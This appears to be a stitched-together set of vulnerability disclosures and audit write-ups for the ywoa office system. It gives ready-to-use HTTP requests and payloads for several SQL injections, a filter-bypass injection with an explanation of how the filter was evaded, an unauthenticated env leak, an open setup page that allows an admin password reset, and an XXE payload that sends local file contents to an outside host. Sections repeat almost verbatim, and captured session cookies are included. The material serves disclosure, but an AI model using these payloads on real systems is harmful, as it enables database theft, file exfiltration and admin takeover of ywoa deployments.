Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:SQL Injection
Vulnerability Details：

1. Global search ${found that ${sql} can be used to perform parameter splicing to cause SQL injection in the path com/cloudweb/oa/mapper/xml/OaNoticeMapper.xml:58. This splicing is implemented in the selectNoticeList() method. Continue to analyze the specific location of this method.

2. When we come to the mapper layer, we find that the selectNoticeList() method is defined in the com/cloudweb/oa/mapper/OaNoticeMapper.java:30 path in the OaNoticeMapper interface. Let's look down to see where this method is called.

3. We analyzed again and found that the selectNoticeList() method was called in the com/cloudweb/oa/service/impl/OaNoticeServiceImpl.java:117 path, and this method is implemented in the listResult() method.

4. Continue to analyze When we come to the controller control layer, we find that the SQL passed into the listResult() method under the path com/cloudweb/oa/controller/OaNoticeController.java:131 is obtained from the getSqlList() method. We continue to analyze how the SQL in the getSqlList() method is defined and what values ​​can be used to splice parameters to trigger the SQL injection vulnerability.

5. Through analysis, it can be concluded that when op=Search and the Brown condition if is true, the SQL statement will directly splice the unfiltered what parameter, thereby triggering the SQL injection vulnerability.

6. Construct a POC to trigger the vulnerability

http://localhost:8096/oa/notice/list?op=search&what=’and updatexml(1,concat(0x7e,user(),0x7e),1)-- - 

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:ENV information leakage
Vulnerability Details：

1. In the configuration file c-core/src/main/resources/application.yml:40, it is found that the default configuration will expose the actuator env interface of SpringBoot.

2. Construct a POC access route to directly obtain sensitive information from the server without authorization

http://localhost:8096/oa/setup/management/env

Environment construction

http://partner.yimihome.com/static/index.html#/index/sys_env

Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed here, the source code is available for download at gitee

https://gitee.com/bestfeng/yimioa

Download a good local idea to open a static look at the code on

[Frontend] <6.1 Version Unauthorized SQL Injection

Through the apikit interface fuzz found an interface that can be unauthorized requests, find the corresponding implementation method in the code
Prerequisite: this hole has a condition, that is, the need for less than 6.1 version, the specific why directly on the code src/main/java/com/cloudweb/oa/controller/ApplicationController.java

The above does not need to care, specifically note the following if(isValid)

First get the version from the configuration

Get to version 6.1, then start the version determination

Determine if it is less than 3

Determine if it is less than 4

Determine if it is less than 5

Determine if it is equal to 6

The condition to be used here is that the version needs to be <= 6 in order to be successful
So change the version

You also need to change one more location, you need to change the version of the database, otherwise the login will prompt the version is inconsistent, the database and configuration file version judgment class in src/main/java/com/cloudweb/oa/service/LoginService.java


Just change the value of the version field in the oa_sys_ver table in the database

Restart tomcat after the change, and then request the specified interface without logging in

POST /oa/setup/checkPool?database=test' HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

Found that the return here actually has a return, will prompt the SQL statement to report an error

Here we bring out the user directly with extractvalue

POC

and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))--+

HTTP

POST /oa/setup/checkPool?database=test'and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))--+ HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:unauthorized
Vulnerability Details：

1. Globally search for the http.authorizeRequests keyword, and in the Spring Security configuration file com/cloudweb/oa/config/WebSecurityConfig.java:187, you will find that any user can access the /setup/** directory files

2. Analyzing the files in the /setup/** directory, we can find that this directory is used to set the database connection address. If unauthorized access is possible, the existing database can be reset to modify the administrator password.

3. Construct POC access routing, reset the database connection address, and reset the backend administrator password

http://localhost:8096/oa/setup/setup.jsp

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:Unauthorized XXE
Vulnerability Details：

1. Globally search for the newDocumentBuilder keyword, and find that db.parse(is); is called in c-main/src/main/java/com/redmoon/weixin/aes/XMLParse.java:42 to parse XML data, and no restrictions are made during the data parsing process. At this time, as long as the xmltext parameter is controllable, the xxe file reading vulnerability can be caused.

3. Continue to track the DecryptMst() method and find that it is called in c-main/src/main/java/com/redmoon/weixin/servlet/WXCallBackServlet.java:103, and the _postData parameter can be assigned with the request data.

POST /oa/servlet/WXCallBack HTTP/1.1
Host: localhost:8096
Content-Type: application/xml
Content-Length: 135

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE ANY [<!ENTITY % remote SYSTEM "http://172.16.13.19:1888/evil.dtd">%remote;%int;%send;]>

<!ENTITY % file SYSTEM "file:///Users/admin/Desktop/test/flag.txt">
<!ENTITY % int "<!ENTITY &#x25; send SYSTEM 'http://172.16.13.19:88/?p=%file;'>">

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:SQL Injection
Vulnerability Details：

1. Global search ${found that SQL injection can be caused by parameter splicing through ${sql} in the com/cloudweb/oa/mapper/xml/UserMapper.xml:98 path. This method is implemented in the listNameBySql() method. Continue to find where this method is defined.

2. After we come to the mapper layer, we see the definition of the listNameBySql() method in the path com/cloudweb/oa/mapper/UserMapper.java:31. Let’s continue to analyze where the listNameBySql() method is called.

3. Continuing down, we can find that the listNameBySql() method is called at the path com/cloudweb/oa/service/impl/UserServiceImpl.java:824, and the listNameBySql() method is returned by the listNameBySql() method. Let's continue to find where listNameBySql() is called.

4. When we come to the controller layer, we find that the listNameBySql() method is called in the path com/cloudweb/oa/controller/UserController.java:876. We continue to analyze which parameters can be used to control the SQL statement to trigger the vulnerability.

5. Through analysis, we found that in the com/cloudweb/oa/controller/UserController.java:809 path, when the condition op=search&deptcode=root is met, we can pass the isValid parameter to concatenate with ${sql} to trigger the SQL injection vulnerability

6. Construct a POC to trigger the vulnerability

POST /oa/user/list HTTP/1.1
Host: localhost:8096
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Cookie: XXX
Connection: close
Content-Type: application/x-www-form-urlencoded

op=search&deptcode=root&isValid=1+order+by+u.orders+desc,regDate+desc)+tmp_count+where+1+=+1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+-+order+by+u.orders+desc,regDate+desc)+tmp_count

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:SQL Injection
Vulnerability Details：

1. Global search ${ found that ${sql} was used in com/cloudweb/oa/mapper/xml/AddressDao.xml:123 to concatenate SQL query statements. Therefore, if the SQL variable here is controllable, there is a SQL injection vulnerability.

6. Finally, back to the Controller layer, we can find in com/cloudweb/oa/controller/AddressController.java:355 that we can pass the sort parameter to the backend code by accessing the route /address/list to trigger the SQL injection vulnerability.

7. Construct POC, you need to log in to the backend to trigger the SQL injection vulnerability.

http://localhost:8096/oa/address/list?sort=desc)/**/tmp_count/**/where/**/1=1/**/and/**/updatexml/**/(1,concat(0x7e,user(),0x7e),1)--+-

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:SQL Injection
Vulnerability Details：

1. Global search ${found that SQL injection can be caused by parameter splicing through ${sql} in the com/cloudweb/oa/mapper/xml/UserMapper.xml:98 path. This method is implemented in the listNameBySql() method. Continue to find where this method is defined.

2. After we come to the mapper layer, we see the definition of the listNameBySql() method in the path com/cloudweb/oa/mapper/UserMapper.java:31. Let’s continue to analyze where the listNameBySql() method is called.

3. Continuing down, we can find that the listNameBySql() method is called at the path com/cloudweb/oa/service/impl/UserServiceImpl.java:824, and the listNameBySql() method is returned by the listNameBySql() method. Let's continue to find where listNameBySql() is called.

4. When we come to the controller layer, we find that the listNameBySql() method is called in the path com/cloudweb/oa/controller/UserController.java:876. We continue to analyze which parameters can be used to control the SQL statement to trigger the vulnerability.

5. Through analysis, we found that in the com/cloudweb/oa/controller/UserController.java:866 path, we can pass the sort parameter to concatenate with ${sql} to trigger the SQL injection vulnerability

6. Construct a POC to trigger the vulnerability

POST /oa/user/list HTTP/1.1
Host: localhost:8096
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Cookie: skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; JSESSIONID=41C4A4D2B2C7E6462A06E98149A74AD4; remember-me=YWRtaW46MTcwNzI4ODk5NDEzMDo3ZTVmMTUxMGNkMmUwNWU5MjkwNWE1MjYwMGFiNTE5ZA
Connection: close
Content-Type: application/x-www-form-urlencoded

sort=)+tmp_count+WHERE+1+=+1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+-

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:SQL Injection
Vulnerability Details：

1. Global search ${found that SQL injection can be caused by parameter splicing through ${sql} in the com/cloudweb/oa/mapper/xml/UserMapper.xml:98 path. This method is implemented in the listNameBySql() method. Continue to find where this method is defined.

2. After we come to the mapper layer, we see the definition of the listNameBySql() method in the path com/cloudweb/oa/mapper/UserMapper.java:31. Let’s continue to analyze where the listNameBySql() method is called.

3. Continuing down, we can find that the listNameBySql() method is called at the path com/cloudweb/oa/service/impl/UserServiceImpl.java:824, and the listNameBySql() method is returned by the listNameBySql() method. Let's continue to find where listNameBySql() is called.

4. When we come to the controller layer, we find that the listNameBySql() method is called in the path com/cloudweb/oa/controller/UserController.java:876. We continue to analyze which parameters can be used to control the SQL statement to trigger the vulnerability.

5. Through analysis, we found that in the com/cloudweb/oa/controller/UserController.java:866 path, we can pass the orderBy parameter to concatenate with ${sql} to trigger the SQL injection vulnerability

6. Construct a POC to trigger the vulnerability

POST /oa/user/list HTTP/1.1
Host: localhost:8096
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Cookie: skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; JSESSIONID=41C4A4D2B2C7E6462A06E98149A74AD4; remember-me=YWRtaW46MTcwNzI4ODk5NDEzMDo3ZTVmMTUxMGNkMmUwNWU5MjkwNWE1MjYwMGFiNTE5ZA
Connection: close
Content-Type: application/x-www-form-urlencoded

orderBy=1+desc)+tmp_count+where+1=1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+-

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:SQL Injection
Vulnerability Details：

1. Global search ${found that ${sql} can be used to perform parameter splicing to cause SQL injection in the path com/cloudweb/oa/mapper/xml/OaNoticeMapper.xml:58. This splicing is implemented in the selectNoticeList() method. Continue to analyze the specific location of this method.

2. When we come to the mapper layer, we find that the selectNoticeList() method is defined in the com/cloudweb/oa/mapper/OaNoticeMapper.java:30 path in the OaNoticeMapper interface. Let's look down to see where this method is called.

3. We analyzed again and found that the selectNoticeList() method was called in the com/cloudweb/oa/service/impl/OaNoticeServiceImpl.java:117 path, and this method is implemented in the listResult() method.

4. Continue to analyze When we come to the controller control layer, we find that the SQL passed into the listResult() method under the path com/cloudweb/oa/controller/OaNoticeController.java:131 is obtained from the getSqlList() method. We continue to analyze how the SQL in the getSqlList() method is defined and what values ​​can be used to splice parameters to trigger the SQL injection vulnerability.

5. Through analysis, we found that when we pass in the orderBy parameter value, it can be directly spliced ​​into ${sql} without parameter filtering, triggering the SQL injection vulnerability in com/cloudweb/oa/service/impl/OaNoticeServiceImpl.java:109 path.

6. Construct a POC to trigger the vulnerability.

http://localhost:8096/oa/notice/list?orderBy=1 desc) tmp_cunto where 1=1 and updatexml(1,concat(0x7e,user(),0x7e),1)-- -

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:SQL Injection
Vulnerability Details：

1. Global search ${found that ${sql} can be used to perform parameter splicing to cause SQL injection in the path com/cloudweb/oa/mapper/xml/OaNoticeMapper.xml:58. This splicing is implemented in the selectNoticeList() method. Continue to analyze the specific location of this method.

2. When we come to the mapper layer, we find that the selectNoticeList() method is defined in the com/cloudweb/oa/mapper/OaNoticeMapper.java:30 path in the OaNoticeMapper interface. Let's look down to see where this method is called.

3. We analyzed again and found that the selectNoticeList() method was called in the com/cloudweb/oa/service/impl/OaNoticeServiceImpl.java:117 path, and this method is implemented in the listResult() method.

4. Continue to analyze When we come to the controller control layer, we find that the SQL passed into the listResult() method under the path com/cloudweb/oa/controller/OaNoticeController.java:131 is obtained from the getSqlList() method. We continue to analyze how the SQL in the getSqlList() method is defined and which parameters can be used for parameter splicing to trigger the SQL injection vulnerability.

5. Through analysis, we found that when we passed the sort parameter in the URL, it was not filtered and was directly spliced ​​into the SQL statement, thus triggering the SQL injection vulnerability

6. Construct a POC to trigger the vulnerability

http://localhost:8096/oa/notice/list?sort=) tmp_cunto where 1=1 and updatexml(1,concat(0x7e,user(),0x7e),1)-- -

ywoaSQL-Inject-Bypass

Environment build

Windows build

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment

http://partner.yimihome.com/static/index.html#/index/sys_env

1, personnel - personnel information - orderbyGET parameter SQL injection

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

Bypass Payload

id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)

Environment build

Windows build

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment

One-click installation, after the installation will prompt the system has expired, go to setup and take a look

Until June 1, but it's okay, here to change the system time can be


Login successfully

Code audit

1. Personnel - personnel information - orderbyGET parameter SQL injection

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 192.168.0.35:9888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.35:9888/oa/swagger-ui.html
Origin: http://192.168.0.35:9888
Connection: close
Cookie: JSESSIONID=D767FF96902770375A5E31400342B545; skincode=lte; name=admin; pwd=; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 137

page=1&limit=20&realname_cond=0&realname=test18&sex=&sex_cond=1&dept=&dept_cond=0&op=search&moduleCode=personbasic&menuItem=1&mainCode=

SQL injection Bypass

The above injection payload is as follows

id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)

The environment here is from idea, but idea has a lot of error reports, many functions are not available, I changed to Windows one-click deployment

After building it, debug it remotely with idea

When you try to reproduce this vulnerability again, you will be prompted with an XSS interception


It was curious at the time why this was XSS intercepted and not SQL intercepted? Look at the code

The specific detection logic is in the filter method in SecurityUtil.java, so let's look at the code logic here

Briefly, the main thing here is to get the values of the request parameters, and then pass them one by one to the following detection logic

Since we just prompted for an XSS attack, we will follow directly into the method antixss to see the specific implementation logic
Next you will come to Antixss.Java

src/main/java/com/cloudwebsoft/framework/security/AntiXSS.java

The antiXSS method is called by passing in the html to be detected and a true

Follow directly in to see

Check the _antiXSS method, where the content is passed in is the content to be detected

Here is the specific detection logic, but I'm only looking at the stripScriptTag method here, because it is the content inside this method that is detected, and our focus is only on what parameters are detected

Mainly by means of regularity and case-insensitive because of CASE_INSENSITIVE

Pull the following when you can see, in fact, and or sleep is filtered, create a new test class, and adjust it to know

Remove AND

The statement is normal, put back and remove sleep, the statement is normal, so since this is the case, replace and with &&, you can

statement returns normally, then after returning here

Returning to SecurityUtil.java, it will enter the logic of SQL injection, following the isValidSqlParam method

Follow the sql_inj method

We have already bypassed the detection of and and need to bypass the code logic in the second box

The main logic here is to separate inj_str using |, which will generate a list to inj_stra[], and then iterate through the list, each loop will use the indexOf method to determine whether the value in inj_stra[i] is in str, that is, if indexOf returns > 0 value exists, and vice versa, it does not exist, here you can also write a class tuned


In the sixth loop, which is when select is detected, then it is obvious that you need to bypass select
Here I was going to try to use

&& extractvalue(1,concat('~',database()))

Unfortunately, '~' will be detected as XSS, so this method does not work

The && here needs to be converted to url encoding, otherwise this request will report 400

So we can only think of ways to select this keyword, here is a bypass of the payload

id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)

Tips: Here just by looking at the screenshot you may think that you can bypass it with SELECT capitalization, but in fact it will be converted to lowercase before calling the sql_inj method

So there is no way to capitalize to bypass

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

Function implementation entrance

First will get the get parameter code, if the code parameter is empty, then get the Get parameter moduleCode and assign it to code, if there is no moduleCode in the get parameter, then get the formCode and copy it to code, here the code parameter passed in is personbasic

Continue to the next page

Here is the OA developer's own implementation of the SQLBuilder class


Follow this method

Follow such as getModuleListSqlAndUrlStr method, then a sql str will be returned, continue down the line is the place that causes SQL injection

Follow up this listResult method

The statements will then be spelled out in the middle

The executeQuery statement is then executed

The difference between the above and the SQL statement is that one is the count spliced in and the other is the original passed in

This is followed by a return, which is executed here with a 5-second wait, so it causes an injection

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:SQL Injection
Vulnerability Details：

1. Global search ${found that ${sql} can be used to perform parameter splicing to cause SQL injection in the path com/cloudweb/oa/mapper/xml/OaNoticeMapper.xml:58. This splicing is implemented in the selectNoticeList() method. Continue to analyze the specific location of this method.

2. When we come to the mapper layer, we find that the selectNoticeList() method is defined in the com/cloudweb/oa/mapper/OaNoticeMapper.java:30 path in the OaNoticeMapper interface. Let's look down to see where this method is called.

3. We analyzed again and found that the selectNoticeList() method was called in the com/cloudweb/oa/service/impl/OaNoticeServiceImpl.java:117 path, and this method is implemented in the listResult() method.

4. Continue to analyze When we come to the controller control layer, we find that the SQL passed into the listResult() method under the path com/cloudweb/oa/controller/OaNoticeController.java:131 is obtained from the getSqlList() method. We continue to analyze how the SQL in the getSqlList() method is defined and what values ​​can be used to splice parameters to trigger the SQL injection vulnerability.

5. Through analysis, we found that when op=Search and the Brown condition if is true, the SQL statement will directly splice the unfiltered cond parameter, thus triggering the SQL injection vulnerability.

http://localhost:8096/oa/notice/list?op=search&what=a&cond= updatexml(1, concat(0x7e, user(), 0x7e), 1)-- -

Vulnerability Product:ywoa
Vulnerability version:before 2024.07.04
Vulnerability type:SQL Injection
Vulnerability Details:

1. Global search ${ found that ${sql} was used in com/cloudweb/oa/mapper/xml/AddressDao.xml:123 to concatenate SQL query statements. Therefore, if the SQL variable here is controllable, there is a SQL injection vulnerability.

3. Query the previous level and find that the selectList() method is called in com/cloudweb/oa/service/AddressService.java:132. Continue to query where listResult() is called.

http://localhost:8096/oa/address/list?orderBy=1/**/desc)/**/tmp_count/**/where/**/1=1/**/and/**/updatexml/**/(1,concat(0x7e,user(),0x7e),1)--+-